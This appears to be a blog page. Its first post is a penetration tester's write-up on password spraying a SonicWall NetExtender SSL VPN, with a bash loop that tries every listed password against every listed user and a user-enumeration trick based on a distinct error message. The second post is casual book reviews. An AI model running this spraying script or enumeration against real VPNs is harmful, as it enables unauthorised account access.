Fun with SonicWall NetExtender

I little while ago I got to play around with a SonicWall firewall that had NetExtender configured. NetExtender is SonicWall’s SSL VPN offering. While my initial goal was just to password spray it, I found a few interesting quirks with the NetExtender client along the way.

Since I had some past experience with SonicWall and NetExtender, I knew there was a Linux CLI client, which led me to believe it would be relatively easy to script a login with it. I downloaded the latest Linux NetExtender client, which can be found with a quick Google search, and installed it. An example of a login attempt using the bare minimum amount of info looks something like this:

 netExtender -u user -p password -d LocalDomain 192.168.1.1:4433
 NetExtender for Linux - Version 9.0.803
 SonicWall
 Copyright (c) 2018 SonicWall
 Connecting to 192.168.1.1:4433…
 There is a problem with the site's security certificate. 
 Warning: self signed certificate
 Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
 Connected.
 Logging in…
 Authentication failure: Login failed - Incorrect username/password.
 SSL VPN logging out…
 Logout command failed
 SSL VPN connection is terminated.
 Exiting NetExtender client

A couple notes about the options and outputs I want to clear up first. The “Login failed” message is pretty self explanatory. The “-u” and “-p” flags should be pretty obvious. The “-d” flag is the login domain, which may be an Active Directory/LDAP back end or the local authentication service (this value is CaSe SeNsItIvE). The default local authentication domain is “LocalDomain”. The warning about a self signed certificate has to be answered, even if you import the cert on the machine. I imagine this wouldn’t be an issue if a valid cert was used. While I was a little disappointed I didn’t immediately get a successful login with user:password, I at least felt that I could script this and spray it regardless. After some trial and error, I came up with this ugly thing:

for j in `cat passwords.txt`; do for i in `cat ../users.txt`; do echo -e "\n\n ***login attempt: $i : $j ***"; echo -e "Y\n" | netExtender -u $i -p $j -d LocalDomain 192.168.1.1:4433; sleep 1; done; done

While it may be ugly and slow, it does the job. It will iterate through the list of users and attempt to log into each user with all the passwords in the list provided. I had a couple delays that would ruin the timing for input, so I added a “sleep 1” in there to help with that and may require a bit bigger of a value depending on connection speeds/reliability. Additionally, it will echo out the username and password attempted, since that isn’t echoed back in the login process itself. If I had a successful attempt, a VPN connection would succeed and just hang there, which I would hopefully catch.

After a few rounds with various user lists, I noticed the following interesting login message:

***login attempt for: user3 : password ***
 NetExtender for Linux - Version 9.0.803
 SonicWall
 Copyright (c) 2018 SonicWall
 Connecting to 192.168.1.1:4433…
 There is a problem with the site's security certificate. 
 Warning: self signed certificate
 Do you want to proceed? (Y:Yes, N:No, V:View Certificate)
 Connected.
 Logging in…
 Authentication failure: User doesn't belong to SSLVPN service group
 SSL VPN logging out…
 Logout command failed
 SSL VPN connection is terminated.
 Exiting NetExtender client

Well, it looks like we have a valid user! It won’t do us much good here since it doesn’t have permission to log in via NetExtender. I initially thought maybe the password was valid, but after a little playing around found out that the same message was returned regardless of the password value. A nice little user-enumeration.

While this may not immediately be valuable since you can’t directly use any of the enumerated users to log into NetExtender, you can always use them for other services or validate the username format. Also, while I didn’t/couldn’t test this with an Active Directory/LDAP back end, it may prove to be a handy way to enum/spray AD from an external perspective.

Edited 2021-01-14

2020 Book “Reviews” – Part Three

Extra credit time!

Lying – Sam Harris
First, I’m not sure if this is a book or just an essay as it is rather short. Like Jordan Peterson’s book, I couldn’t help but reading this in Sam Harris’ voice in my head. That aside, this is a quick rundown, but deeper dive, of why lying is bad and how to identify lies, even when they don’t seem like a lie. The main point, I feel, is that lying is bad in just about every single case. I guess that explains why it is so short. There isn’t much more to say than “avoid lying at all costs”. Something I agree with. Insert something witty about truth here.

In Praise of Shadows – Jun’ichiro Tanizaki
I don’t remember where I had heard the recommendation for this essay, and checking my Amazon order history, I bought it 3 years ago today. What a coincidence. Anyway, at the surface this seems like a grumpy old man reminiscing about the “good ol’ days” in a very polite way. I feel like common theme among these complaints and grumblings is that there is beauty in contrast, though not directly stated. Gold leaf on black lacquer, white face paint/makeup and dark clothing, bright extravagant clothing in darkness, pictures capturing important reminders in a dark corner of a room. An interesting short read that I want to read again after having some time to think about it.

Norwegian Wood – Haruki Murakami
I have started this book three times and quit twice, but this time I finished it. I feel that it starts off strong, but then slowly spins wildly out of control into one hormonal teenage boy sex “dream” after another. I thought I would just get that out of the way. Every named female character in this book sleeps with the main character, Toru. It vaguely reminds me of the first track from Pinkerton, in a way. Towards the end of the book, the climax of the story just sends things into a seemingly rushed mess. I’m not sure if that was intentional, or the author just getting bored of writing and just wanted to be done. Maybe this is a cultural thing I just don’t get, I’m not sure. I really wanted to enjoy this book and did for a while, but once it was over, I don’t know if I want to read any more of Murakami’s work.

Brave New World – Aldous Huxley
It has been a while since I read this last. This time around, it was more apparent to me that the “utopia” portrayed here is the product of apathy and distraction. More and more in the real world, I see signs of how distracted or preoccupied a large portion of people really are. While 1984 painted a terrifying world of oppression, I feel like the Brave New World is much more achievable and likely. If everyone is happy, there would be less push back. It is an interesting thing to think about. I felt previously that there were two protagonists throughout the story. However, this time, it just felt as though a story was being told and almost everyone was kind of a “bad guy.” Maybe not Helmholtz.

The Great Gatsby – F. Scott Fitzgerald
After reading this again for the first time in a long while, I will say this is still one of my favorite books. I’m impressed at the amount of story packed into the short read, which I’m sure has added to its legacy. For the first time, what was going on in the “elevator scene” really stood out to me and made me laugh a little. I don’t think anything I can say will do this book justice. It is still just as great as it was the first time I read it.

Kafka on the ShoreHaruki Murakami
While I wasn’t impressed with Norwegian Wood, I wanted to give Murakami another try. This was a little better to read, but it was significantly longer. Again, the main character, this time a 15 year old boy (who is not written as anyone under the age of 20), sleeps with every named female. At this point, I’m sure all of Murakami’s books include this theme, if you will. There are two story lines throughout this book, and I will say one, the “B” story, is way more interesting to read. There are even a couple good one-liners in there. Overall, another “eh”. I probably won’t be giving Murakami another try.

The Professor and the Madman – Simon Winchester
While I never have really been interested in the history of the dictionary, it was brought to my attention that this story was more strange than one would have initially thought. I enjoyed the retelling of the decades of the creation of the Oxford English Dictionary and the, at times, mysterious William C Minor. The writing, however, seemed to very fluffy, if that word is appropriate. I think there was a goal of using as many different and uncommon words as possible, no doubt in theme with the subject, but it made it longer than it probably needed to be.

Party Monster – James St. James
This was so much fun to read. I have watched both the “Party Monster” movie and documentary prior to reading this, so maybe that added to the enjoyment. I feel like someone coming into this without any previous exposure to the whole story of Micheal Alig or the Club Kids may be confused at times. James St. James is all over the place and sometimes gets distracted with the story he is trying to tell, but it is part of the charm. It seems to be written incredibly well, no offense intended. I enjoyed ever minute spent reading this.

Well, I forgot to post this in 2020. So, here we are a few days into 2021. I guess Party Monster was a good way to end the insanity of the year. I’m going to keep up on my reading for 2021 and I’ll be back with thoughts on those books as well.